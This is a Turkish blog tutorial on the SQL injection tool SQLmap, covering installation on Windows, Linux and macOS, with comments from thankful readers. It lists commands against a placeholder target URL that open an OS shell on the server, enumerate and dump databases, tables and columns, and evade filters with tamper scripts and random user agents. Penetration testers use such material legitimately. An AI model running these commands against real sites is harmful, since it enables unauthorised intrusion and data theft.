SQLmap nedir ? : Sqlmap, pyhton dilinde geliştirilmiş çok kullanışlı bir Sql enjeksiyon aracıdır. Temel olarak belirlediğiniz parametrelere göre hedef web sitesinde SQL Payload kombinasyonları deneyerek ilgili web sitesini tarar.
Peki avantajları nelerdir? :
Çalıştırmak için sadece birkaç parametre verdikten sonra onlarca açık testi deneyerek ve bulduğu sonuçları depolayarak hedefi sizden daha hızlı tarayabilir. Aynı zamanda, sunucu üzerinde mevcut kullanıcının izinlerine bağlı olarak başka veri tabanı adları vb. bulabilmeniz ve verdiğiniz komutlara göre sunucuya bir shell kurabilir.
SQLmap Nasıl Kurulur ? :
Windows İşletim Sistemlerinde ;
Öncelikle SQLmap'i çalıştırabilmek için sisteminize Python'u kurmanız gerekmektedir buradan indirip kurun. Sonrasında ise Github üzerinden SQLmap dosyasını indirin burdan indirebilirsiniz. Verdiğim linklerden gerekli dosyaları kurduktan sonra SQLmap'i sorunsuz bir şekilde kullanmaya başlayabilirsiniz.
Linux İşletim Sistemlerinde ;
Kali Linux gibi sızma testleri için oluşturulmuş işletim sistemlerinde SQLmap hazır olarak gelmektedir. Diğer Linux işletim sistemlerinde ise, Git komutunu daha önce kurduysanız;
git clone https://github.com/sqlmapproject/sqlmap.git
kurmadıysanız, bu komuttan önce
sudo apt-get install git
Mac OS İşletim Sisteminde ;
Gördüğüm istatistiklere göre web sitemizi ziyaret eden çok fazla Mac OS işletim sistemli kullanıcı olduğu için Mac OS işletim sisteminde de kurmayı gösteriyorum :)
Öncelikle;
ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" < /dev/null 2> /dev/null
brew install sqlmap
sonrasında bu komutu kullanarak SQLmap'i de sisteminize kurabilirsiniz.
SQLmap Kullanımı :
Şimdi SQLmap kullanmak için gereken her şeyi yaptıktan sonra ileri düzey SQLmap kullanımına geçebiliriz.
Öncelikle Hedef Sitede yazma yetkiniz var mı onu kontrol etme komutunu vererek başlıyorum. Yazma yetkiniz varsa siteye, SQLmap kullanarak Shell sokabilirsiniz.
sqlmap -u "hedef_url" -o -b --current-user --is-dba
sqlmap -u "hedef_url" -o -b --os-shell
sqlmap -u "hedef_url" --dbs
sqlmap -u "hedef_url" -D database_ismi --tables
sqlmap -u "hedef_url" -D database_ismi -T tablo_ismi --columns
sqlmap -u "hedef_url" -D database_ismi -T tablo_ismi -C kolon_ismi --dump
sqlmap -u "hedef_url" --dbs --tamper=space2comment
sqlmap -u "hedef_url" --dbs --batch
sqlmap -u "hedef_url" --dbs --random-agent
sqlmap -u "hedef_url" --dbs --level=5 --risk=3
sqlmap -u "hedef_url" -D database_ismi -T tablo_ismi -C kolon_ismi --dump --tamper=space2comment --batch --random-agent --level=5 --risk=3
sqlmap -hh
Teşekkürler
YanıtlaSilÇok yardımcı oldu thx
YanıtlaSilEline sağlık
YanıtlaSil